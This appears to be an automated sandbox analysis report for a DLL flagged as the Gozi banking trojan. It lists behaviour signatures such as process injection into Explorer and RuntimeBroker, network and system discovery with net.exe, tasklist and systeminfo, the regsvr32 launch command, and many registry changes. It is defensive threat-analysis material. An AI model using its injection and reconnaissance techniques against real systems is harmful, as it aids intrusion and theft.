Analysis Overview
SHA256: 9ec85fa9097826fce61020be2f15ed01c320109c7ec3654c2a42b1b5c46b4b6f
Threat Level: Known bad
The file aa856dedda137f7419ecc36766ed74e3 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Gathers system information
Modifies registry class
Runs net.exe
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Discovers systems in the same network
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported: 2022-08-03 16:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2022-08-03 16:02
Reported: 2022-08-03 16:05
Platform: win7-20220715-en
Max time kernel: 39s
Max time network: 44s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2024 wrote to memory of 1092 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll
Network
Files
memory/2024-54-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmp
memory/1092-55-0x0000000000000000-mapping.dmp
memory/1092-56-0x0000000075B81000-0x0000000075B83000-memory.dmp
memory/1092-57-0x0000000010000000-0x000000001000E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted: 2022-08-03 16:02
Reported: 2022-08-03 16:05
Platform: win10v2004-20220721-en
Max time kernel: 151s
Max time network: 138s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4380 set thread context of 3116 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 3116 set thread context of 3576 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3116 set thread context of 3828 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3116 set thread context of 4552 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3116 set thread context of 1740 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = (binary value omitted) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = 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 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = a3b25a8b63a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = 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 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = b1abff8163a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = 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 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\197bfdf98b90f1568047f539021597d317ed02a72fda0352cb78764413458770" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = 7fdf2f8263a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = cf34488b63a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c0eb29be-1c77-40e1- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc7c23c5-8053-49d2- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a49211c83afb11de1426666b7c241972cb34d99715d635879a6dcc7331aa299a" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f64f1dc4-a930-4385- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = 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 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37b82531-b0bf-420d- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = 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 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = e41a908b63a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = 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 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- = 5ae61e8263a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc7c23c5-8053-49d2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- = 737e398263a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bfc5aaf5-2e5b-480b- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = 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 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = 41edf18163a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- | C:\Windows\System32\RuntimeBroker.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
